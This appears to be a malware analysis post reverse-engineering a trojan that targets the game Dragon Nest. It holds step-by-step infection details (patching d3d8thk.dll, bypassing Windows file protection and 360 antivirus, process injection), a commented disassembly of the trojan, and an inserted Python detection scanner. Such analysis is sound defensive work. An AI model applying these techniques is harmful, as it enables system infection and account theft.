The sample's timestamp is 08/13/2010.
I reversed every function in the trojan's main body; I did not look at the dropped bin, which installs a global message hook to intercept messages.
The code contains a lot of byte-by-byte string filling, tedious and uninteresting, and I stripped that meaningless code when posting.
The sample has been uploaded in the fourth reply; anyone interested in the bin is welcome to take a look.
I covered this virus's self-verification routine in an earlier post of mine:
Link:
http://bbs.pediy.com/showthread.php?t=119736
Read the description first, then the code.
1. Extracts a resource named "MWAI" from itself and drops it into the system temp folder as kb****.bin (each * is a random digit 0-9).
2. Then verifies itself: it checks whether the last 8 bytes of the current process's file are 7001000000010000 to decide whether the trojan is intact (as opposed to, say, an unpacked copy; the trojan is packed with PECompact and can be unpacked directly with an unpacker). If the check passes, the last 0x170 bytes of the current trojan file are appended to the bin just dropped, completing the assembly of the bin file.
3. Looks up the game path under "SOFTWARE\snda\dn"; if it is not found there, searches "Software\Microsoft\Windows\ShellNoRoam\MUICache".
4. Deletes mfc42.log in the game directory.
5. Copies the dropped bin to system dir\system, changes the extension to axs and sets the hidden attribute.
6. Loads the dropped bin with LoadLibrary and calls its LoadDll function, which installs a global WH_GETMESSAGE hook.
7. Copies the dropped bin into the game directory as mfc42.log and sets the hidden attribute.
8. Checks whether "d3d8thk.dll" exists under system dir\DllCache and system dir\system\; if so, backs it up to system dir\d3d8thk.dll.dat.
9. Opens system dir\d3d8thk.dll.dat and reads the parts of the PE file into a custom structure, a local buffer pointer variable and an array of section pointers. The structure is laid out as follows:
[esi]    = buffer (pointer to the PE file)
[esi+8]  = IMAGE_DOS_HEADER
[esi+c]  = DOS stub
[esi+10] = size of the DOS stub
[esi+14] = 0x40 (size of IMAGE_DOS_HEADER)
[esi+18] = IMAGE_NT_HEADER
[esi+1c] = first IMAGE_SECTION_HEADER structure
[esi+20] = second one
and so on.
struct _PEINFO{
    LPCSTR lpImage_Dos_Header;
    LPCSTR lpImage_Dos_Stub;
    int iSizeOfDosStub;
    int iSizeOfDosHeader;
    LPCSTR lpImage_Nt_Header;
    LPCSTR lpImage_Section_Header[0x10];
};
[esi+1c+50] holds the data pointers of the individual sections, one every +4 bytes, and so on:
LPCSTR lpSections[0x10];
10. Searches the system dir\d3d8thk.dll.dat file for the ".code" and "text" sections, copies the 357 bytes at its own address 0x00407034 to the head of the target section and checks the value at offset 0x164 of the target section: if the data was written correctly it should be 0x9090. It then searches the target section for "246", writes "kb****.axs" right after it and a 0x70 (ASCII 'p') right before "246".
11. Writes the modified system dir\d3d8thk.dll.dat back.
12. Copies system dir\d3d8thk.dll.dat to game dir\d3d8thk.dll.
13. Moves system dir\system\d3d8thk.dll to system dir\system\d3d8thk.dll.**** (four random uppercase letters), then immediately deletes that file. Moves system dir\d3d8thk.dll to system dir\d3d8thk.dll.**** (four random uppercase letters).
14. Checks whether system dir\DllCache\d3d8thk.dll exists. If it does, checks whether 360 is present; if so, it uses a trick to evade 360's API-call checks and call sfc_os.dll ordinal 5, thereby modifying the system file. If 360 is absent, it checks in turn for the processes "conime.exe", "IEXPLORER.EXE", "ctfmon.exe" and "explorer.exe"; if one of them exists, it injects into that process and runs code there to elevate privileges, call ordinal 5 and move system dir\DllCache\d3d8thk.dll. The interesting part is that without 360 this step actually cannot succeed, because the code injected into the remote process has a bug and never completes the move of the system file; see the code for details.
15. Moves system dir\DllCache\d3d8thk.dll to system dir\DllCache\d3d8thk.dll.**** (four random uppercase letters).
16. Copies system dir\d3d8thk.dll.dat to system dir\system\d3d8thk.dll.dat.
17. Renames system dir\system\d3d8thk.dll.dat to system dir\system\d3d8thk.dll.
18. Copies system dir\d3d8thk.dll.dat to system dir\DllCache\d3d8thk.dll.
19. Deletes the bin dropped in the temp folder.
20. Reads the temp path from the environment variable "TEMP", creates a batch file temp path\tempVidio.bat there and runs it; the batch deletes the virus itself and then deletes the batch file.
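The header layout in step 9 and the section checks in step 10 can be turned into a scanner for a patched d3d8thk.dll. This is an added Python example, not code from the post or from the trojan: it mirrors the _PEINFO fields, then checks the code section for the marks step 10 describes (0x9090 at offset 0x164, "246" preceded by 'p' and followed by a kb****.axs name). The sample PE it builds is constructed here and is not a real d3d8thk.dll; PEInfo, infection_markers and the sample helpers are my own names.

```python
import re
import struct

# Marks the trojan leaves in the target section (step 10 above).
PATCH_CHECK_OFFSET = 0x164          # checked after the 357-byte copy
PATCH_CHECK_VALUE = b"\x90\x90"     # expected there when the write succeeded
AXS_NAME = re.compile(rb"kb\d{4}\.axs")


class PEInfo:
    """Mirror of the trojan's _PEINFO layout (step 9): DOS header, DOS stub,
    NT headers, up to 0x10 section headers and the raw data of each section."""

    def __init__(self, image: bytes):
        if image[:2] != b"MZ":
            raise ValueError("not a DOS/PE image")
        e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
        if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            raise ValueError("missing PE signature")
        self.dos_header = image[:0x40]                 # iSizeOfDosHeader = 0x40
        self.dos_stub = image[0x40:e_lfanew]           # iSizeOfDosStub = e_lfanew - 0x40
        # IMAGE_FILE_HEADER: NumberOfSections at +6, SizeOfOptionalHeader at +20
        num_sections, opt_size = struct.unpack_from("<H12xH", image, e_lfanew + 6)
        first_section = e_lfanew + 24 + opt_size
        self.nt_header = image[e_lfanew:first_section]
        self.section_headers = []                      # (name, PointerToRawData, SizeOfRawData)
        self.sections = []                             # raw bytes of each section
        for i in range(min(num_sections, 0x10)):       # the struct reserves 0x10 slots
            hdr = image[first_section + 40 * i:first_section + 40 * (i + 1)]
            name = hdr[:8].rstrip(b"\0")
            raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)
            self.section_headers.append((name, raw_ptr, raw_size))
            self.sections.append(image[raw_ptr:raw_ptr + raw_size])

    def code_section(self):
        """Step 10 searches for a '.code' section and a 'text' section."""
        for (name, _, _), data in zip(self.section_headers, self.sections):
            if name == b".code" or b"text" in name:
                return name, data
        return None, b""


def infection_markers(image: bytes) -> dict:
    """Report whether the code section carries the marks from step 10."""
    name, data = PEInfo(image).code_section()
    report = {"section": name, "nop_pair": False, "marker_246": False, "axs_name": None}
    report["nop_pair"] = data[PATCH_CHECK_OFFSET:PATCH_CHECK_OFFSET + 2] == PATCH_CHECK_VALUE
    pos = data.find(b"246")
    if pos > 0 and data[pos - 1:pos] == b"p":         # 0x70 written before "246"
        report["marker_246"] = True
        m = AXS_NAME.match(data, pos + 3)              # loader name written after "246"
        if m:
            report["axs_name"] = m.group(0).decode()
    report["infected"] = report["nop_pair"] and report["marker_246"] and report["axs_name"] is not None
    return report


def build_sample_pe(code: bytes) -> bytes:
    """Constructed minimal PE32 with one '.text' section; not a real d3d8thk.dll."""
    e_lfanew = 0x50                                    # 0x40 DOS header + 0x10 stub
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xE0
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x2102)
    opt_hdr = bytearray(opt_size)
    struct.pack_into("<H", opt_hdr, 0, 0x10B)          # PE32 magic
    raw_ptr = 0x200
    sec_hdr = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, len(code),
                          raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt_hdr) + sec_hdr
    return headers.ljust(raw_ptr, b"\0") + code


def sample_code(infected: bool) -> bytes:
    """Constructed .text contents: 0x300 bytes of int3 filler, then a '246' string
    as a clean build would carry it, or the trojan's 'p246kb****.axs' form."""
    body = bytearray(b"\xCC" * 0x300)
    tail = b"\0" * 8 + b"246" + b"\0" * 16
    if infected:
        body[PATCH_CHECK_OFFSET:PATCH_CHECK_OFFSET + 2] = PATCH_CHECK_VALUE
        tail = b"\0" * 7 + b"p246kb1234.axs" + b"\0" * 6
    return bytes(body) + tail


if __name__ == "__main__":
    for flag in (False, True):
        print("infected" if flag else "clean", infection_markers(build_sample_pe(sample_code(flag))))
```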
[Segment 0]
Looks for the game processes dnlauncher.exe and DragonNest.exe on the current system and terminates them if found.
00402C75 /$ 55 push ebp
00402C76 |. 8BEC mov ebp, esp
00402C78 |. 83EC 34 sub esp, 34
00402C7B |. 32C0 xor al, al
00402C7D |. 6A 01 push 1
00402C7F |. 8845 FE mov byte ptr [ebp-2], al
00402C82 |. 8845 EE mov byte ptr [ebp-12], al
00402C85 |. 8845 DC mov byte ptr [ebp-24], al
00402C88 |. 8D45 CC lea eax, dword ptr [ebp-34]
00402C8B |. 50 push eax
00402C8C |. C645 F0 64 mov byte ptr [ebp-10], 64
00402C90 |. C645 F1 6E mov byte ptr [ebp-F], 6E
00402C94 |. C645 F2 6C mov byte ptr [ebp-E], 6C
00402D38 |. C645 DB 65 mov byte ptr [ebp-25], 65
00402D3C |. E8 0CE6FFFF call 0040134D ; privilege elevation
00402D41 |. 8D45 F0 lea eax, dword ptr [ebp-10] ; eax = "dnlauncher.exe"
00402D44 |. 50 push eax ; push the Dragon Nest game process name "dnlauncher.exe"
00402D45 |. E8 B6E2FFFF call 00401000 ; look up the "dnlauncher.exe" process; returns its PID if found, otherwise 0
00402D4A |. 50 push eax
00402D4B |. E8 B7E4FFFF call 00401207 ; terminate the Dragon Nest process
00402D50 |. 8D45 E0 lea eax, dword ptr [ebp-20] ; eax = "DragonNest.exe"
00402D53 |. 50 push eax
00402D54 |. E8 A7E2FFFF call 00401000 ; look up the "DragonNest.exe" process; returns its PID if found, otherwise 0
00402D59 |. 50 push eax
00402D5A |. E8 A8E4FFFF call 00401207 ; terminate the process found
00402D5F |. 83C4 18 add esp, 18
00402D62 |. 6A 50 push 50 ; /Timeout = 80. ms
00402D64 |. FF15 1C604000 call dword ptr [<&kernel32.Sleep>] ; \Sleep(0x50) = 80 ms
00402D6A |. C9 leave
00402D6B \. C3 retn
Core procedure (segment 1):
00402D6C /$ 55 push ebp
00402D6D |. 8BEC mov ebp, esp
00402D6F |. 81EC 04090000 sub esp, 904 ; allocate 0x904 bytes of stack
00402D75 |. 53 push ebx
00402D76 |. 56 push esi
00402D77 |. 57 push edi
00402D78 |. 6A 40 push 40
00402D7A |. 5A pop edx ; edx = 0x40
00402D7B |. 33DB xor ebx, ebx ; ebx = 0
00402D7D |. 8BCA mov ecx, edx
00402D7F |. 33C0 xor eax, eax ; eax = 0
00402D81 |. 8DBD 11FCFFFF lea edi, dword ptr [ebp-3EF] ; edi = stack buffer pointer
00402D87 |. 889D 10FCFFFF mov byte ptr [ebp-3F0], bl ; a zero byte just before edi
00402D8D |. F3:AB rep stos dword ptr es:[edi] ; fill 0x40 zero DWORDs at ebp-3EF
00402D8F |. 66:AB stos word ptr es:[edi] ; one more zero word
00402D91 |. AA stos byte ptr es:[edi] ; and one more zero byte
00402D92 |. 8BCA mov ecx, edx ; ecx = 0x40
00402D94 |. 33C0 xor eax, eax
00402D96 |. 8DBD 05F9FFFF lea edi, dword ptr [ebp-6FB] ; same as above with a different stack pointer; each pass zero-fills roughly 0x100 bytes of stack
00402D9C |. 889D 04F9FFFF mov byte ptr [ebp-6FC], bl
00402DA2 |. F3:AB rep stos dword ptr es:[edi]
00402DA4 |. 66:AB stos word ptr es:[edi]
00402DA6 |. AA stos byte ptr es:[edi]
00402DA7 |. 8BCA mov ecx, edx
00402E0F |. C645 B4 4B mov byte ptr [ebp-4C], 4B ; fill the local string buffer with "kernel32.dll"
00402E82 |. 8D45 AC lea eax, dword ptr [ebp-54]
00402E85 |. 6A 75 push 75
00402E87 |. 50 push eax ; push the stack pointer ebp-54
00402E88 |. C685 5CFFFFFF 53 mov byte ptr [ebp-A4], 53
00402E8F |. FF75 0C push dword ptr [ebp+C] ; push the third argument, the heap buffer pointer
00402E92 |. C685 5DFFFFFF 4F mov byte ptr [ebp-A3], 4F ; fill "SOFTWARE\snda\dn"
00402E99 |. C685 5EFFFFFF 46 mov byte ptr [ebp-A2], 46
00402EA0 |. C685 5FFFFFFF 54 mov byte ptr [ebp-A1], 54
00402EA7 |. C685 60FFFFFF 57 mov byte ptr [ebp-A0], 57
00402EAE |. C685 61FFFFFF 41 mov byte ptr [ebp-9F], 41
00402EB5 |. C685 62FFFFFF 52 mov byte ptr [ebp-9E], 52
00402EBC |. C685 63FFFFFF 45 mov byte ptr [ebp-9D], 45
00402EC3 |. C685 64FFFFFF 5C mov byte ptr [ebp-9C], 5C
00402ECA |. C685 65FFFFFF 73 mov byte ptr [ebp-9B], 73
00402ED1 |. C685 66FFFFFF 6E mov byte ptr [ebp-9A], 6E
00402ED8 |. C685 67FFFFFF 64 mov byte ptr [ebp-99], 64
00402EDF |. C685 68FFFFFF 61 mov byte ptr [ebp-98], 61
00402EE6 |. C685 69FFFFFF 5C mov byte ptr [ebp-97], 5C
00402EED |. C685 6AFFFFFF 64 mov byte ptr [ebp-96], 64
00402EF4 |. C685 6BFFFFFF 6E mov byte ptr [ebp-95], 6E
00402EFB |. 889D 6CFFFFFF mov byte ptr [ebp-94], bl
00402F01 |. C645 A4 6C mov byte ptr [ebp-5C], 6C ; fill "loader"
00402F05 |. C645 A5 6F mov byte ptr [ebp-5B], 6F
00402F09 |. C645 A6 61 mov byte ptr [ebp-5A], 61
00402F0D |. C645 A7 64 mov byte ptr [ebp-59], 64
00402F11 |. C645 A8 65 mov byte ptr [ebp-58], 65
00402F15 |. C645 A9 72 mov byte ptr [ebp-57], 72
00402F19 |. 885D AA mov byte ptr [ebp-56], bl
00402F1C |. C685 70FFFFFF 5C mov byte ptr [ebp-90], 5C ; fill "\DNLauncher.exe"
00402F23 |. C685 71FFFFFF 44 mov byte ptr [ebp-8F], 44
00402F2A |. C685 72FFFFFF 4E mov byte ptr [ebp-8E], 4E
00402F31 |. C685 73FFFFFF 4C mov byte ptr [ebp-8D], 4C
00402F38 |. C685 74FFFFFF 61 mov byte ptr [ebp-8C], 61
00402F3F |. C685 75FFFFFF 75 mov byte ptr [ebp-8B], 75
00402F46 |. C685 76FFFFFF 6E mov byte ptr [ebp-8A], 6E
00402F4D |. C685 77FFFFFF 63 mov byte ptr [ebp-89], 63
00402F54 |. C685 78FFFFFF 68 mov byte ptr [ebp-88], 68
00402F5B |. C685 79FFFFFF 65 mov byte ptr [ebp-87], 65
00402F62 |. C685 7AFFFFFF 72 mov byte ptr [ebp-86], 72
00402F69 |. C685 7BFFFFFF 2E mov byte ptr [ebp-85], 2E
00402F70 |. C685 7CFFFFFF 65 mov byte ptr [ebp-84], 65
00402F77 |. C685 7DFFFFFF 78 mov byte ptr [ebp-83], 78
00402F7E |. C685 7EFFFFFF 65 mov byte ptr [ebp-82], 65
00402F85 |. 889D 7FFFFFFF mov byte ptr [ebp-81], bl
00402F8B |. C645 AC 57 mov byte ptr [ebp-54], 57 ; fill "WMAT"
00402F8F |. C645 AD 4D mov byte ptr [ebp-53], 4D
00402F93 |. C645 AE 41 mov byte ptr [ebp-52], 41
00402F97 |. C645 AF 54 mov byte ptr [ebp-51], 54
00402F9B |. 885D B0 mov byte ptr [ebp-50], bl
00402F9E |. E8 62F6FFFF call 00402605 ; drop a file named kb****.bin into the system temp directory, each * a random digit 0-9
00402FA3 |. 83C4 0C add esp, 0C
00402FA6 |. 85C0 test eax, eax ; returns TRUE on success, FALSE otherwise
00402FA8 |. 74 09 je short 00402FB3 ; check whether the drop succeeded; jump on failure
00402FAA |. FF75 0C push dword ptr [ebp+C] ; push the path of the file just dropped
00402FAD |. E8 7CFAFFFF call 00402A2E ; this function is interesting: it first verifies itself by signature to see whether the current file has been unpacked; if not, it assembles the bin by taking the last 0x170 bytes of the original virus body and appending them to the end of the bin just created
00402FB2 |. 59 pop ecx ; ecx = absolute file path
00402FB3 |> FF75 0C push dword ptr [ebp+C] ; push the path of the dropped file
00402FB6 |. E8 74E7FFFF call 0040172F ; strlen of the absolute path
00402FBB |. 85C0 test eax, eax ; is the return value 0?
00402FBD |. 59 pop ecx ; ecx = absolute file path
00402FBE |. 0F84 1E050000 je 004034E2 ; jump if it returned 0
00402FC4 |. 8B35 00604000 mov esi, dword ptr [<&kernel32.LoadLibraryA>] ; kernel32.LoadLibraryA
00402FCA |. 8D45 8C lea eax, dword ptr [ebp-74] ; eax = "CopyFileA"
00402FCD |. 50 push eax
00402FCE |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; eax = "Kernel32.dll"
00402FD1 |. 50 push eax ; /FileName
00402FD2 |. FFD6 call esi ; \LoadLibraryA Kernel32.dll
00402FD4 |. 50 push eax ; push the HMODULE of kernel32.dll
00402FD5 |. E8 57E9FFFF call 00401931 ; GetProcAddress: resolve CopyFileA
00402FDA |. 8985 58FFFFFF mov dword ptr [ebp-A8], eax ; save the CopyFileA address in a local
00402FE0 |. 8D85 70FFFFFF lea eax, dword ptr [ebp-90] ; eax = "DNLauncher.exe"
00402FE6 |. 50 push eax
00402FE7 |. 8D45 A4 lea eax, dword ptr [ebp-5C] ; eax = "loader"
00402FEA |. 50 push eax
00402FEB |. 8D85 5CFFFFFF lea eax, dword ptr [ebp-A4] ; eax = "SOFTWARE\snda\dn"
00402FF1 |. 50 push eax
00402FF2 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC]
00402FF8 |. 68 02000080 push 80000002 ; root key (0x80000002 = HKEY_LOCAL_MACHINE)
00402FFD |. 50 push eax ; buffer that receives the game's absolute path
00402FFE |. C645 98 6D mov byte ptr [ebp-68], 6D ; fill "mfc42.log"
00403002 |. C645 99 66 mov byte ptr [ebp-67], 66
00403006 |. C645 9A 63 mov byte ptr [ebp-66], 63
0040300A |. C645 9B 34 mov byte ptr [ebp-65], 34
0040300E |. C645 9C 32 mov byte ptr [ebp-64], 32
00403012 |. C645 9D 2E mov byte ptr [ebp-63], 2E
00403016 |. C645 9E 6C mov byte ptr [ebp-62], 6C
0040301A |. C645 9F 6F mov byte ptr [ebp-61], 6F
0040301E |. C645 A0 67 mov byte ptr [ebp-60], 67
00403022 |. 885D A1 mov byte ptr [ebp-5F], bl
00403025 |. C645 80 44 mov byte ptr [ebp-80], 44 ; fill "DeleteFileA"
00403029 |. C645 81 65 mov byte ptr [ebp-7F], 65
0040302D |. C645 82 6C mov byte ptr [ebp-7E], 6C
00403031 |. C645 83 65 mov byte ptr [ebp-7D], 65
00403035 |. C645 84 74 mov byte ptr [ebp-7C], 74
00403039 |. C645 85 65 mov byte ptr [ebp-7B], 65
0040303D |. C645 86 46 mov byte ptr [ebp-7A], 46
00403041 |. C645 87 69 mov byte ptr [ebp-79], 69
00403045 |. C645 88 6C mov byte ptr [ebp-78], 6C
00403049 |. C645 89 65 mov byte ptr [ebp-77], 65
0040304D |. C645 8A 41 mov byte ptr [ebp-76], 41
00403051 |. 885D 8B mov byte ptr [ebp-75], bl
00403054 |. E8 63EEFFFF call 00401EBC ; look up the game path under "SOFTWARE\snda\dn", falling back to "Software\Microsoft\Windows\ShellNoRoam\MUICache"; returns 1 if found, 0 otherwise
00403059 |. 83C4 1C add esp, 1C ; stack cleanup
0040305C |. 85C0 test eax, eax ; found?
0040305E |. 0F84 F7000000 je 0040315B ; jump if the game path was not found
00403064 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC] ; eax = game path
0040306A |. C645 E2 5C mov byte ptr [ebp-1E], 5C
0040306E |. 50 push eax ; /game path
0040306F |. 885D E3 mov byte ptr [ebp-1D], bl ; |
00403072 |. E8 7F220000 call <jmp.&MSVCRT.strlen> ; \strlen
00403077 |. 80BC05 13FDFFFF 5C cmp byte ptr [ebp+eax-2ED], 5C ; does the path end with "\"?
0040307F |. 59 pop ecx
00403080 |. 74 12 je short 00403094 ; if it ends with "\", strcat "mfc42.log" directly; otherwise append "\" first
00403082 |. 8D45 E2 lea eax, dword ptr [ebp-1E]
00403085 |. 50 push eax
00403086 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC]
0040308C |. 50 push eax
0040308D |. E8 B3E6FFFF call 00401745 ; strcat "\"
00403092 |. 59 pop ecx
00403093 |. 59 pop ecx
00403094 |> 8D45 98 lea eax, dword ptr [ebp-68] ; "mfc42.log"
00403097 |. 50 push eax
00403098 |. 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8]
0040309E |. 50 push eax
0040309F |. E8 A1E6FFFF call 00401745 ; strcat "mfc42.log" to build the absolute path
004030A4 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC]
004030AA |. 50 push eax ; eax = game directory
004030AB |. 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0]
004030B1 |. 50 push eax
004030B2 |. E8 97E5FFFF call 0040164E ; strcpy the game directory into ebp-3F0
004030B7 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC]
004030BD |. 50 push eax
004030BE |. 8D85 00F8FFFF lea eax, dword ptr [ebp-800]
004030C4 |. 50 push eax
004030C5 |. E8 84E5FFFF call 0040164E ; strcpy the game directory into ebp-800
004030CA |. 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8]
004030D0 |. 50 push eax
004030D1 |. 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0]
004030D7 |. 50 push eax
004030D8 |. E8 68E6FFFF call 00401745 ; strcat to build game dir\mfc42.log
004030DD |. 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0] ; game dir\mfc42.log
004030E3 |. C745 C4 01000000 mov dword ptr [ebp-3C], 1
004030EA |. 50 push eax ; game dir\mfc42.log
004030EB |. E8 7FE6FFFF call 0040176F ; does the file exist? returns 0 if not
004030F0 |. 83C4 24 add esp, 24 ; stack cleanup
004030F3 |. 85C0 test eax, eax
004030F5 |. 74 32 je short 00403129 ; jump if the file does not exist
004030F7 |. 8D45 80 lea eax, dword ptr [ebp-80] ; "DeleteFileA"
004030FA |. 50 push eax
004030FB |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; "kernel32.dll"
004030FE |. 50 push eax
004030FF |. FFD6 call esi ; LoadLibraryA
00403101 |. 50 push eax
00403102 |. E8 2AE8FFFF call 00401931 ; GetProcAddress DeleteFileA
00403107 |. 59 pop ecx
00403108 |. 8BF8 mov edi, eax ; edi = address of DeleteFileA
0040310A |. 59 pop ecx
0040310B |. 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0]
00403111 |. 50 push eax ; game dir\mfc42.log
00403112 |. FFD7 call edi ; DeleteFileA
00403114 |. 85C0 test eax, eax
00403116 |. 75 03 jnz short 0040311B ; jump if the delete succeeded; on failure fall through and clear ebp-3C
00403118 |. 895D C4 mov dword ptr [ebp-3C], ebx ; ebp-3C = 0
0040311B |> 8D85 04F9FFFF lea eax, dword ptr [ebp-6FC] ; eax = absolute path of the mfc42.log file
00403121 |. 50 push eax
00403122 |. FFD7 call edi ; DeleteFileA
00403124 |. 395D C4 cmp dword ptr [ebp-3C], ebx
00403127 |. 74 32 je short 0040315B ; jump if ebp-3C is 0 (the delete failed)
00403129 |> 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0]
0040312F |. 50 push eax ; eax = absolute path of the mfc42.log file
00403130 |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8]
00403136 |. 50 push eax ; buffer
00403137 |. E8 12E5FFFF call 0040164E ; strcpy
0040313C |. 8D85 04F9FFFF lea eax, dword ptr [ebp-6FC] ; eax = absolute path of the mfc42.log file
00403142 |. 50 push eax
00403143 |. 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4]
00403149 |. 50 push eax
0040314A |. E8 FFE4FFFF call 0040164E ; strcpy
0040314F |. 83C4 10 add esp, 10
00403152 |. 395D C4 cmp dword ptr [ebp-3C], ebx
00403155 |. 0F85 1E010000 jnz 00403279
0040315B |> 6A 0E push 0E
0040315D |. 33C0 xor eax, eax
0040315F |. 59 pop ecx ; ecx = 0x0E
00403160 |. 8DBD 1DFFFFFF lea edi, dword ptr [ebp-E3]
00403166 |. 889D 1CFFFFFF mov byte ptr [ebp-E4], bl
0040316C |. 6A 5C push 5C ; "\"
0040316E |. F3:AB rep stos dword ptr es:[edi] ; fill 0x0E zero DWORDs
00403170 |. FF75 0C push dword ptr [ebp+C] ; path of the dropped bin
00403173 |. C645 DC 5C mov byte ptr [ebp-24], 5C ; fill "\system\"
00403177 |. 66:AB stos word ptr es:[edi]
00403179 |. AA stos byte ptr es:[edi]
0040317A |. C645 DD 73 mov byte ptr [ebp-23], 73
0040317E |. C645 DE 79 mov byte ptr [ebp-22], 79
00403182 |. C645 DF 73 mov byte ptr [ebp-21], 73
00403186 |. C645 E0 74 mov byte ptr [ebp-20], 74
0040318A |. C645 E1 65 mov byte ptr [ebp-1F], 65
0040318E |. C645 E2 6D mov byte ptr [ebp-1E], 6D
00403192 |. C645 E3 5C mov byte ptr [ebp-1D], 5C
00403196 |. 885D E4 mov byte ptr [ebp-1C], bl
00403199 |. E8 88E4FFFF call 00401626 ; strrchr: pointer to the last occurrence of the character
0040319E |. 8BF8 mov edi, eax ; edi = position of the last "\"
004031A0 |. 47 inc edi ; edi++
004031A1 |. 57 push edi ; now points at the file name
004031A2 |. E8 88E5FFFF call 0040172F ; strlen
004031A7 |. 83E8 03 sub eax, 3 ; eax = file name length - 3
004031AA |. 50 push eax ; /maxlen
004031AB |. 8D85 1CFFFFFF lea eax, dword ptr [ebp-E4] ; |
004031B1 |. 57 push edi ; |src
004031B2 |. 50 push eax ; |dest
004031B3 |. FF15 54604000 call dword ptr [<&MSVCRT.strncpy>] ; \strncpy
004031B9 |. 8D85 1CFFFFFF lea eax, dword ptr [ebp-E4]
004031BF |. 68 28704000 push 00407028 ; ASCII "axs"
004031C4 |. 50 push eax
004031C5 |. E8 7BE5FFFF call 00401745 ; strcat: build a file name with the same base name as the dropped bin and the axs extension
004031CA |. 8D85 1CFFFFFF lea eax, dword ptr [ebp-E4] ; kb****.axs
004031D0 |. 50 push eax
004031D1 |. 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8]
004031D7 |. 50 push eax
004031D8 |. E8 71E4FFFF call 0040164E ; strcpy
004031DD |. 83C4 28 add esp, 28 ; stack cleanup
004031E0 |. 8D45 E8 lea eax, dword ptr [ebp-18]
004031E3 |. C645 E8 47 mov byte ptr [ebp-18], 47 ; fill "GetWindowsDirectoryA"
004031E7 |. C645 E9 65 mov byte ptr [ebp-17], 65
004031EB |. 50 push eax
004031EC |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; "kernel32.dll"
004031EF |. 50 push eax
004031F0 |. C645 EA 74 mov byte ptr [ebp-16], 74
004031F4 |. C645 EB 57 mov byte ptr [ebp-15], 57
004031F8 |. C645 EC 69 mov byte ptr [ebp-14], 69
004031FC |. C645 ED 6E mov byte ptr [ebp-13], 6E
00403200 |. C645 EE 64 mov byte ptr [ebp-12], 64
00403204 |. C645 EF 6F mov byte ptr [ebp-11], 6F
00403208 |. C645 F0 77 mov byte ptr [ebp-10], 77
0040320C |. C645 F1 73 mov byte ptr [ebp-F], 73
00403210 |. C645 F2 44 mov byte ptr [ebp-E], 44
00403214 |. C645 F3 69 mov byte ptr [ebp-D], 69
00403218 |. C645 F4 72 mov byte ptr [ebp-C], 72
0040321C |. C645 F5 65 mov byte ptr [ebp-B], 65
00403220 |. C645 F6 63 mov byte ptr [ebp-A], 63
00403224 |. C645 F7 74 mov byte ptr [ebp-9], 74
00403228 |. C645 F8 6F mov byte ptr [ebp-8], 6F
0040322C |. C645 F9 72 mov byte ptr [ebp-7], 72
00403230 |. C645 FA 79 mov byte ptr [ebp-6], 79
00403234 |. C645 FB 41 mov byte ptr [ebp-5], 41
00403238 |. 885D FC mov byte ptr [ebp-4], bl
0040323B |. FFD6 call esi ; LoadLibraryA
0040323D |. 50 push eax
0040323E |. E8 EEE6FFFF call 00401931 ; GetProcAddress GetWindowsDirectoryA
00403243 |. 59 pop ecx
00403244 |. 59 pop ecx
00403245 |. 8D8D 18FEFFFF lea ecx, dword ptr [ebp-1E8]
0040324B |. 68 04010000 push 104 ; MAX_PATH
00403250 |. 51 push ecx ; buffer that receives the Windows directory
00403251 |. FFD0 call eax ; GetWindowsDirectoryA
00403253 |. 8D45 DC lea eax, dword ptr [ebp-24] ; "\system\"
00403256 |. 50 push eax
00403257 |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; Windows directory
0040325D |. 50 push eax
0040325E |. E8 E2E4FFFF call 00401745 ; strcat: build windows\system\
00403263 |. 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8] ; kb****.axs
00403269 |. 50 push eax
0040326A |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; windows\system\
00403270 |. 50 push eax
00403271 |. E8 CFE4FFFF call 00401745 ; strcat: absolute path of kb****.axs
00403276 |. 83C4 10 add esp, 10
00403279 |> 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; windows\system\kb****.axs
0040327F |. 50 push eax
00403280 |. E8 AAE4FFFF call 0040172F ; strlen
00403285 |. 85C0 test eax, eax
00403287 |. 59 pop ecx
00403288 |. 0F84 2F010000 je 004033BD ; jump if it returned 0
0040328E |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; windows\system\kb****.axs
00403294 |. 53 push ebx
00403295 |. 50 push eax ; windows\system\kb****.axs
00403296 |. FF75 0C push dword ptr [ebp+C] ; absolute path of the dropped bin
00403299 |. FF95 58FFFFFF call dword ptr [ebp-A8] ; CopyFileA: copy the dropped bin into system dir\system
0040329F |. 85C0 test eax, eax
004032A1 |. 0F84 16010000 je 004033BD ; jump if the copy failed
004032A7 |. 395D C4 cmp dword ptr [ebp-3C], ebx
004032AA |. 0F84 D7000000 je 00403387 ; jump if ebp-3C is 0
004032B0 |. 8D45 C8 lea eax, dword ptr [ebp-38]
004032B3 |. C645 C8 47 mov byte ptr [ebp-38], 47 ; fill "GetFileAttributesA"
